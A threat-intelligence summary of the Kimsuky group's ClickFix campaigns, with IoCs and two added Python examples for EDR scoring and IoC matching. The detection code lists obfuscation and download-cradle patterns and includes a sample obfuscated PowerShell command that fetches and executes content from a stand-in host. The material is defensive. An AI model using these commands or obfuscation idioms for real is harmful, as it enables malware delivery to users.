Analysis of Kimsuky Group Threat Cases Using the ‘ClickFix’ Tactics

The Kimsuky group’s ClickFix tactic manipulates victims into executing malicious PowerShell commands via deceptive messages and phishing emails, typically disguised as error notifications or security procedures. The same tactic has been employed by state-sponsored actors from North Korea, Iran, and Russia, underscoring the need for robust EDR detection strategies against obfuscated malware and unusual behaviors. #ClickFix #Kimsuky #BabyShark

Keypoints

  • Kimsuky group uses the ClickFix tactic to deceive victims into executing malicious commands by impersonating error messages or security document procedures.
  • ClickFix attacks involve victims manually copying and pasting obfuscated PowerShell commands that execute malicious activities.
  • ClickFix has been observed in spear phishing emails, fake websites, and misleading notifications targeting high-profile individuals and organizations.
  • State-sponsored threat actors from North Korea, Iran, and Russia have been linked to ClickFix-based campaigns.
  • Obfuscation techniques, such as string reversal and code insertion, are employed to evade detection by security products.
  • Enhanced Endpoint Detection and Response (EDR) strategies are critical for identifying and mitigating ClickFix attacks and related abnormal behaviors.
  • Recorded Indicators of Compromise include multiple malicious domains, IP addresses, and file hashes connected to Kimsuky’s BabyShark campaigns.
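The key points above describe the command-line shape a defender has to catch: a PowerShell command the user pasted in person, whose real instructions are hidden by string reversal or inserted junk characters before being evaluated. The following is an added example of how an EDR rule author might score process-creation events for that shape; it is not code from the Genians report or from any EDR product. The heuristic patterns, their weights, the alert threshold, the field names of the event record and all sample events are assumptions constructed for this example (the reversed literal in the first sample is only a harmless Write-Output, so the analyst-side deobfuscation step can be checked by eye).

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Generic heuristics for the command-line shape the report describes: a user-pasted
# PowerShell command whose real instructions are hidden by string reversal or by junk
# characters stripped at runtime, then handed to an evaluator. The patterns and weights
# are this example's own assumptions, not detection content taken from the report.
HEURISTICS = {
    "hidden_window":   (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "no_profile":      (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "encoded_command": (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    "string_reversal": (re.compile(r"\[array\]::reverse|\[-1\.\.-|tochararray\(\)\s*\[-1", re.I), 3),
    "runtime_replace": (re.compile("-replace\\s+['\"]", re.I), 2),   # junk chars removed before use
    "dynamic_eval":    (re.compile(r"\biex\b|invoke-expression", re.I), 3),
    "download_cradle": (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 2),
}
ALERT_THRESHOLD = 5          # assumed tuning value for this example
QUOTED_LITERAL = re.compile(r"'([^']{8,})'")


@dataclass
class ProcessEvent:
    """Minimal process-creation record as an EDR would log it (field names assumed)."""
    image: str
    parent_image: str
    command_line: str


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched heuristic names) for one process-creation event."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    hits = [name for name, (rx, _) in HEURISTICS.items() if rx.search(ev.command_line)]
    score = sum(HEURISTICS[h][1] for h in hits)
    # A pasted ClickFix command is started from the user's desktop session, so the shell's
    # parent is explorer.exe rather than a scheduler, installer or management agent.
    if hits and ev.parent_image.lower() == "explorer.exe":
        hits.append("user_launched")
        score += 2
    return score, hits


def reveal_reversed_literals(command_line: str) -> list[str]:
    """Analyst aid: when the command reverses a string at runtime, show each long quoted
    literal read backwards so the intended instruction is readable without executing it."""
    if not HEURISTICS["string_reversal"][0].search(command_line):
        return []
    return [lit[::-1] for lit in QUOTED_LITERAL.findall(command_line)]


def triage(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, int, list[str]]]:
    """Keep only events at or above the alert threshold, with their score and evidence."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append((ev, score, hits))
    return alerts


# Constructed sample events for this example. The first two mimic the shapes the report
# lists (string reversal, junk-character insertion); the reversed payload is only a
# harmless Write-Output. The last three are benign shapes the threshold should ignore.
SAMPLE_EVENTS = [
    ProcessEvent("powershell.exe", "explorer.exe",
                 "powershell -nop -w hidden -c \"$s='tset tuptuO-etirW'; iex (-join $s[-1..-($s.Length)])\""),
    ProcessEvent("powershell.exe", "explorer.exe",
                 "powershell -w hidden -c \"$c=('I#n#v#o#k#e#-#E#x#p#r#e#s#s#i#o#n' -replace '#',''); "
                 "& $c (iwr http://example.invalid/p -UseBasicParsing).Content\""),
    ProcessEvent("powershell.exe", "svchost.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),
    ProcessEvent("powershell.exe", "explorer.exe", "powershell -NoProfile -Command Get-Date"),
    ProcessEvent("cmd.exe", "explorer.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for ev, score, hits in triage(SAMPLE_EVENTS):
        print(f"ALERT score={score} parent={ev.parent_image} hits={hits}")
        for revealed in reveal_reversed_literals(ev.command_line):
            print("  reversed literal reads:", revealed)
```

The second sample shows why a pattern list alone is not enough: the inserted `#` characters defeat a plain `Invoke-Expression` match, so the rule also scores the `-replace` idiom that strips them at runtime and the interactive parent process. Weighting the evidence rather than matching single strings is what lets the benign `Get-Date` and the scheduled inventory script stay below the threshold.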

MITRE Techniques

  • [T1204.004] User Execution: Malicious Copy and Paste – Victims are tricked into copying and pasting malicious commands into PowerShell.

Indicators of Compromise

  • [Domain] Malicious command and control domains – konamo[.]xyz, kida.plusdocs.kro[.]kr, securedrive.fin-tech[.]com, raedom[.]store, and others.
  • [IP Address] Command and control servers and related infrastructure – 1.223.129[.]234 (KR), 103.149.98[.]248 (VN), 115.92.4[.]123 (KR), 38.180.157[.]197 (NL), and other IPs linked to C2 activities.
  • [File Hash] Malicious LNK and script files used in attacks – 40ce5cf6be259120d179f51993aec854, a523bf5dca0f2a4ace0cf766d9225343, fc4c319d7940ad1b7c0477469420bd11, 89a725b08ab0e8885fc03b543638be96, and other hashes.
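The indicators above are published defanged (`[.]` in place of `.`), so they cannot be compared with raw telemetry as-is. The following is an added example of refanging the listed domains, IPs and MD5 hashes and sweeping them over log lines of mixed formats; it is not code from the Genians report. The indicator values are taken verbatim from the list above; the refang rules, the log formats, the RFC 1918 client addresses and every sample line are assumptions constructed for this example. Domains are matched label by label so that hosts beneath a listed domain hit while look-alike names that merely end in the same characters do not.

```python
from __future__ import annotations

import re
from ipaddress import ip_address

# Indicators exactly as published in the list above, still defanged.
DEFANGED_DOMAINS = ["konamo[.]xyz", "kida.plusdocs.kro[.]kr",
                    "securedrive.fin-tech[.]com", "raedom[.]store"]
DEFANGED_IPS = ["1.223.129[.]234", "103.149.98[.]248", "115.92.4[.]123", "38.180.157[.]197"]
FILE_HASHES = ["40ce5cf6be259120d179f51993aec854", "a523bf5dca0f2a4ace0cf766d9225343",
               "fc4c319d7940ad1b7c0477469420bd11", "89a725b08ab0e8885fc03b543638be96"]

HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")   # run on lowercased text
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[a-f0-9]{32}\b")


def refang(text: str) -> str:
    """Undo common defanging conventions (assumed set) so published indicators compare
    equal to raw log data; applied to both the IoC list and the scanned lines."""
    text = text.strip().lower()
    for marker in ("[.]", "(.)", "{.}"):
        text = text.replace(marker, ".")
    return text.replace("[:]", ":").replace("hxxp", "http")


class IocMatcher:
    def __init__(self, domains, ips, hashes):
        self.domains = {refang(d) for d in domains}
        self.ips = {ip_address(refang(i)) for i in ips}
        self.hashes = {h.strip().lower() for h in hashes}

    def match_domain(self, host: str) -> bool:
        """True for a listed domain or any host beneath it. Matching label by label means
        cdn.raedom.store hits but the look-alike notraedom.store does not."""
        labels = refang(host).rstrip(".").split(".")
        return any(".".join(labels[i:]) in self.domains for i in range(len(labels)))

    def scan_line(self, line: str) -> list[tuple[str, str]]:
        """Return (kind, value) hits found in one log line, whatever its format."""
        text = refang(line)   # also catches indicators pasted defanged into tickets or notes
        hits = [("domain", h) for h in HOST_RE.findall(text) if self.match_domain(h)]
        for ip in IPV4_RE.findall(text):
            try:
                if ip_address(ip) in self.ips:
                    hits.append(("ip", ip))
            except ValueError:
                pass   # e.g. 999.1.1.1 from a version string is not an address
        hits += [("md5", h) for h in MD5_RE.findall(text) if h in self.hashes]
        return hits

    def scan(self, lines: list[str]) -> list[tuple[int, list[tuple[str, str]]]]:
        """Line index plus hits for every line that contains at least one indicator."""
        return [(i, hits) for i, line in enumerate(lines) if (hits := self.scan_line(line))]


# Constructed sample lines in several log formats; timestamps, hostnames and the
# 10.0.0.0/8 client addresses are made up for this example.
SAMPLE_LOGS = [
    "2025-01-15T09:12:03Z dns client=10.0.0.21 query=konamo.xyz type=A",
    "2025-01-15T09:12:04Z proxy client=10.0.0.21 dst=38.180.157.197:443 sni=cdn.raedom.store",
    "2025-01-15T09:13:10Z edr host=WS-17 file=C:\\Users\\a\\Downloads\\notice.lnk "
    "md5=40ce5cf6be259120d179f51993aec854",
    "2025-01-15T09:14:00Z dns client=10.0.0.22 query=intranet.example.com type=A",
    "analyst note: user reported visiting securedrive.fin-tech[.]com after an error popup",
]

if __name__ == "__main__":
    matcher = IocMatcher(DEFANGED_DOMAINS, DEFANGED_IPS, FILE_HASHES)
    for index, hits in matcher.scan(SAMPLE_LOGS):
        print(f"line {index}: {hits}")
```

Because the scanner refangs each line before matching, a defanged indicator quoted in a ticket (the last sample line) is found alongside the same indicator in raw DNS, proxy and EDR records.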

Read more: https://www.genians.co.kr/blog/threat_intelligence/suky-castle